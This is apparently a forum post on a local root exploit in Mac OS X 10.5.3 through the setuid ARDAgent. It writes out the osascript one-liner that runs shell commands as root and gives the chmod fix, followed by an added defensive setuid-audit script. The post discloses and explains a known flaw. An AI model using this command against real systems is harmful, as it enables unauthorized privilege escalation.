Local root exploit for 10.5.3...
What a way to start this forum. This exploit is starting to hit the news sites.
As a non-privileged user you can do this kind of thing exploiting the remote desktop agent:
osascript -e 'tell app "ARDAgent" to do shell script "touch /bin/foobar"'
And then with "ls -l /bin/foobar" you can see that you've written to /bin and created a file owned by root. Try:
rm /bin/foobar
and it'll fail: you need to use sudo. Turns out that the ARDAgent (/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ardagent) has the setuid bit set, where it shouldn't be. So the fix is trivial, just a chmod away.
This is a local exploit and needs physical access. So you know, they could just copy all your files to a USB stick and walk off.
Not every day we see an exploit for the Mac. OK, on to more productive posts!
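
The fix described in the post is removing a setuid bit that should not be set. As an added example (not part of the original post; the function names, the baseline file and the scratch files are constructed for illustration), a small audit that lists setuid files under a directory, reports any that are not on an expected baseline, and clears the bit:

```shell
#!/bin/sh
# Added example: audit a tree for unexpected setuid files, then clear the bit.
# All function names here are hypothetical helpers, not a system tool.

# Print every regular file under $1 that has the setuid bit (mode 4000) set.
list_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null | sort
}

# Print setuid files under $1 that are NOT in baseline file $2
# (one path per line). Empty output means nothing unexpected was found.
unexpected_setuid() {
    list_setuid "$1" | while IFS= read -r f; do
        grep -Fxq -- "$f" "$2" || printf '%s\n' "$f"
    done
}

# Remove the setuid bit from $1; succeeds only if the bit is really gone.
clear_setuid() {
    chmod u-s "$1" && [ ! -u "$1" ]
}

# Constructed demo in a scratch directory: two setuid files, one of which
# is on the baseline; the other is reported and then fixed.
demo() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/suid.XXXXXX") || return 1
    printf '#!/bin/sh\n' > "$d/expected_tool"
    printf '#!/bin/sh\n' > "$d/agent"
    printf '#!/bin/sh\n' > "$d/plain"
    chmod 4755 "$d/expected_tool" "$d/agent"
    chmod 0755 "$d/plain"
    printf '%s\n' "$d/expected_tool" > "$d/baseline.txt"
    before=$(unexpected_setuid "$d" "$d/baseline.txt")
    clear_setuid "$d/agent" || { rm -rf "$d"; return 1; }
    after=$(unexpected_setuid "$d" "$d/baseline.txt")
    rm -rf "$d"
    # Only the unlisted file is flagged, and nothing is flagged after the fix.
    [ "$before" = "$d/agent" ] && [ -z "$after" ]
}

demo && echo "audit demo passed"
```

On a real system the same functions would be pointed at a directory such as /System/Library/CoreServices, run with enough privilege to read it, and the baseline taken from a known-good install.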